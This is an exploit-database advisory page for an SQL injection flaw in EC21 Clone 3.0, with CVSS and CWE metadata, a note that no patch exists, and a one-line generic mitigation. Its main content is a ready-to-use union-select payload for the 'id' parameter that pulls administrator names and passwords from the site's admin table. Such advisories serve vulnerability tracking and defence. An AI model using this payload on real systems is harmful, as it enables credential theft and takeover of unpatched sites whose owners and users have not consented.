header-logo
Suggest Exploit
vendor:
EC21 Clone
by:
v3n0m
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EC21 Clone
Affected Version From: EC21 Clone 3.0
Affected Version To: EC21 Clone 3.0
Patch Exists: NO
Related CWE:
CPE: a:ec21_clone:3.0
Metasploit:
Other Scripts:
Platforms Tested:
2010

EC21 Clone 3.0 (id) SQL Injection Vulnerability

-9999+union+all+select+0,0,group_concat(es_admin_name,char(58),es_pwd)v3n0m,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+esb2b_admin--

Mitigation:

Implement proper input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Navigation

Suggest Exploit

Services By CQR